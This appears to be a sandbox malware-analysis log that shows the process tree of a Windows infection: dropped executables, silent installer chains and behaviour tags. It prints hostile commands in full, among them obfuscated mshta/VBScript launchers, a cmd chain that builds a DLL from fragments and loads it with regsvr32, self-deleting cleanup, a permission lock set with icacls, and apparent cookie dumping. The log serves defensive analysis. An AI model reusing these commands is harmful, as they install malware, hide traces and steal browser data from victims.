C:\Users\Admin\AppData\Local\Temp\5A8B.exeC:\Users\Admin\AppData\Local\Temp\5A8B.exe1⤵
- Executes dropped EXE
PID:3984
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1092
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:816
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3816
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:416
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1336
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:2860
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1256
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:500
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2820
-
C:\Users\Admin\AppData\Local\Temp\B742.exeC:\Users\Admin\AppData\Local\Temp\B742.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2752 -
C:\Users\Admin\AppData\Local\Temp\B742.exeC:\Users\Admin\AppData\Local\Temp\B742.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
PID:1636 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\8ee7440e-26f6-4fd7-800a-64fea4f46e22" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:184
-
-
C:\Users\Admin\AppData\Local\Temp\B742.exe"C:\Users\Admin\AppData\Local\Temp\B742.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:5072
-
C:\Users\Admin\AppData\Local\Temp\B742.exe"C:\Users\Admin\AppData\Local\Temp\B742.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:5096
-
C:\Users\Admin\AppData\Local\cfd9e064-5c1e-450e-a037-dd75e310196d\build2.exe"C:\Users\Admin\AppData\Local\cfd9e064-5c1e-450e-a037-dd75e310196d\build2.exe"5⤵PID:4708
-
C:\Users\Admin\AppData\Local\cfd9e064-5c1e-450e-a037-dd75e310196d\build2.exe"C:\Users\Admin\AppData\Local\cfd9e064-5c1e-450e-a037-dd75e310196d\build2.exe"6⤵PID:5312
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B7FE.exeC:\Users\Admin\AppData\Local\Temp\B7FE.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3056 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im B7FE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\B7FE.exe" & del C:\ProgramData\*.dll & exit2⤵PID:2584
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im B7FE.exe /f3⤵
- Kills process with taskkill
PID:4232
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:4440
-
-
-
C:\Users\Admin\AppData\Local\Temp\BB8A.exeC:\Users\Admin\AppData\Local\Temp\BB8A.exe1⤵
- Executes dropped EXE
PID:3140 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct("WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\BB8A.exe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if """" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\BB8A.exe"" ) do taskkill -F -im ""%~Nxw"" " , 0 ,tRUe ) )2⤵PID:3200
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\BB8A.exe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "" =="" for %w in ( "C:\Users\Admin\AppData\Local\Temp\BB8A.exe" ) do taskkill -F -im "%~Nxw"3⤵PID:3868
-
C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT4⤵
- Executes dropped EXE
PID:1764 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct("WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if ""-pLTfn82smRxoqI1Rgg5LiENy6ewubmT "" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" ) do taskkill -F -im ""%~Nxw"" " , 0 ,tRUe ) )5⤵PID:3704
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "-pLTfn82smRxoqI1Rgg5LiENy6ewubmT " =="" for %w in ( "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" ) do taskkill -F -im "%~Nxw"6⤵PID:1720
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCripT:cLose ( cReatEoBJEcT ( "WScript.sheLl" ). Run ( "CMd.EXe /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = ""MZ"" > FIq2DqT_.Q © /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P + WWAA.Ue5 + JBVF~.yS+rcEI.~+ Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U ",0 , true))5⤵PID:3512
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = "MZ" > FIq2DqT_.Q © /b /y FIq2DQT_.Q+ QBEZ3.8 +R5FQa3.v3P +WWAA.Ue5 + JBVF~.yS+rcEI.~+Mj12.DS +q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U6⤵PID:2584
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo "7⤵PID:3864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>FIq2DqT_.Q"7⤵PID:1340
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe -S ..\MRZCIH.DO /U7⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:2064
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -im "BB8A.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3504
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\C83D.exeC:\Users\Admin\AppData\Local\Temp\C83D.exe1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:1240
-
C:\Users\Admin\AppData\Local\Temp\CD4F.exeC:\Users\Admin\AppData\Local\Temp\CD4F.exe1⤵
- Executes dropped EXE
PID:3984 -
C:\Users\Admin\AppData\Local\Temp\is-UV01O.tmp\CD4F.tmp"C:\Users\Admin\AppData\Local\Temp\is-UV01O.tmp\CD4F.tmp" /SL5="$2013A,188175,104448,C:\Users\Admin\AppData\Local\Temp\CD4F.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3976 -
C:\Users\Admin\AppData\Local\Temp\is-0SHAC.tmp\134 Vaporeondè_éçè_)))_.exe"C:\Users\Admin\AppData\Local\Temp\is-0SHAC.tmp\134 Vaporeondè_éçè_)))_.exe" /S /UID=rec73⤵
- Executes dropped EXE
PID:3832 -
C:\Program Files\Uninstall Information\MHUYTWFGVU\irecord.exe"C:\Program Files\Uninstall Information\MHUYTWFGVU\irecord.exe" /VERYSILENT4⤵
- Executes dropped EXE
PID:4632 -
C:\Users\Admin\AppData\Local\Temp\is-O5DB4.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-O5DB4.tmp\irecord.tmp" /SL5="$201FE,5808768,66560,C:\Program Files\Uninstall Information\MHUYTWFGVU\irecord.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:4680 -
C:\Program Files (x86)\i-record\I-Record.exe"C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4904
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2a-09862-2a2-5e2bf-4124bb9fbfe5a\Caepyqewaxi.exe"C:\Users\Admin\AppData\Local\Temp\2a-09862-2a2-5e2bf-4124bb9fbfe5a\Caepyqewaxi.exe"4⤵
- Executes dropped EXE
PID:4700
-
-
C:\Users\Admin\AppData\Local\Temp\0e-cf6f6-096-7d8bb-3446ac0342adb\Kybewashico.exe"C:\Users\Admin\AppData\Local\Temp\0e-cf6f6-096-7d8bb-3446ac0342adb\Kybewashico.exe"4⤵
- Executes dropped EXE
PID:4764 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\egtbagkz.tvk\GcleanerEU.exe /eufive & exit5⤵PID:3512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1hy4ug3v.omm\installer.exe /qn CAMPAIGN="654" & exit5⤵PID:5012
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bi3y4lia.wzp\Setup3310.exe /Verysilent /subid=623 & exit5⤵PID:4596
-
C:\Users\Admin\AppData\Local\Temp\bi3y4lia.wzp\Setup3310.exeC:\Users\Admin\AppData\Local\Temp\bi3y4lia.wzp\Setup3310.exe /Verysilent /subid=6236⤵PID:4860
-
C:\Users\Admin\AppData\Local\Temp\is-BNH27.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-BNH27.tmp\Setup3310.tmp" /SL5="$102CA,138429,56832,C:\Users\Admin\AppData\Local\Temp\bi3y4lia.wzp\Setup3310.exe" /Verysilent /subid=6237⤵PID:4212
-
C:\Users\Admin\AppData\Local\Temp\is-7IB18.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-7IB18.tmp\Setup.exe" /Verysilent8⤵PID:3980
-
C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"9⤵PID:5684
-
C:\Users\Admin\AppData\Roaming\8942219.exe"C:\Users\Admin\AppData\Roaming\8942219.exe"10⤵PID:5160
-
-
C:\Users\Admin\AppData\Roaming\1500708.exe"C:\Users\Admin\AppData\Roaming\1500708.exe"10⤵PID:1728
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"11⤵PID:5492
-
-
-
C:\Users\Admin\AppData\Roaming\7494104.exe"C:\Users\Admin\AppData\Roaming\7494104.exe"10⤵PID:5412
-
-
-
C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"9⤵PID:5704
-
C:\Users\Admin\AppData\Local\Temp\is-FVJ4T.tmp\MediaBurner.tmp"C:\Users\Admin\AppData\Local\Temp\is-FVJ4T.tmp\MediaBurner.tmp" /SL5="$303AC,303887,220160,C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"10⤵PID:5856
-
C:\Users\Admin\AppData\Local\Temp\is-MA1EN.tmp\_____________bob.exe"C:\Users\Admin\AppData\Local\Temp\is-MA1EN.tmp\_____________bob.exe" /S /UID=burnerch111⤵PID:1724
-
-
-
-
C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"9⤵PID:5676
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit10⤵PID:6244
-
-
-
C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"9⤵PID:5668
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵PID:5468
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵PID:2544
-
-
-
C:\Program Files (x86)\Data Finder\Versium Research\updatetes.exe"C:\Program Files (x86)\Data Finder\Versium Research\updatetes.exe"9⤵PID:5756
-
-
C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"9⤵PID:5748
-
C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe" -a10⤵PID:5452
-
-
-
C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"9⤵PID:5740
-
-
C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"9⤵PID:5732
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fyi424z3.hm4\google-game.exe & exit5⤵PID:4516
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4512
-
-
C:\Users\Admin\AppData\Local\Temp\fyi424z3.hm4\google-game.exeC:\Users\Admin\AppData\Local\Temp\fyi424z3.hm4\google-game.exe6⤵PID:3316
-
C:\Users\Admin\AppData\Local\Temp\fyi424z3.hm4\google-game.exe"C:\Users\Admin\AppData\Local\Temp\fyi424z3.hm4\google-game.exe" -a7⤵PID:4000
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2luibd3v.qbj\GcleanerWW.exe /mixone & exit5⤵PID:1724
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hlguk33n.ydw\toolspab1.exe & exit5⤵PID:4648
-
C:\Users\Admin\AppData\Local\Temp\hlguk33n.ydw\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\hlguk33n.ydw\toolspab1.exe6⤵PID:5492
-
C:\Users\Admin\AppData\Local\Temp\hlguk33n.ydw\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\hlguk33n.ydw\toolspab1.exe7⤵PID:5424
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aapju1x4.wea\SunLabsPlayer.exe /S & exit5⤵PID:3704
-
C:\Users\Admin\AppData\Local\Temp\aapju1x4.wea\SunLabsPlayer.exeC:\Users\Admin\AppData\Local\Temp\aapju1x4.wea\SunLabsPlayer.exe /S6⤵PID:2988
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa8328.tmp\tempfile.ps1"7⤵PID:5896
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\E089.exeC:\Users\Admin\AppData\Local\Temp\E089.exe1⤵
- Executes dropped EXE
PID:2824
-
C:\Users\Admin\AppData\Local\Temp\EC42.exeC:\Users\Admin\AppData\Local\Temp\EC42.exe1⤵
- Executes dropped EXE
PID:1220 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵PID:4512
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
PID:4816
-
-
-
C:\Users\Admin\AppData\Local\Temp\F76F.exeC:\Users\Admin\AppData\Local\Temp\F76F.exe1⤵
- Executes dropped EXE
PID:4152
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4992
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4900
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:2228 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵PID:8
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4984
-
C:\Users\Admin\AppData\Local\Temp\is-E7R4F.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-E7R4F.tmp\LabPicV3.tmp" /SL5="$203D6,506127,422400,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"1⤵PID:5848
-
C:\Users\Admin\AppData\Local\Temp\is-GFDTA.tmp\12(((((.exe"C:\Users\Admin\AppData\Local\Temp\is-GFDTA.tmp\12(((((.exe" /S /UID=lab2142⤵PID:5664
-
-
C:\Users\Admin\AppData\Local\Temp\is-V5R8N.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-V5R8N.tmp\lylal220.tmp" /SL5="$303D4,172303,88576,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"1⤵PID:5840
-
C:\Users\Admin\AppData\Local\Temp\is-3OHI3.tmp\èeèrgegdè_éçè_)))_.exe"C:\Users\Admin\AppData\Local\Temp\is-3OHI3.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=lylal2202⤵PID:4160
-
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:3352 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵PID:5812
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6112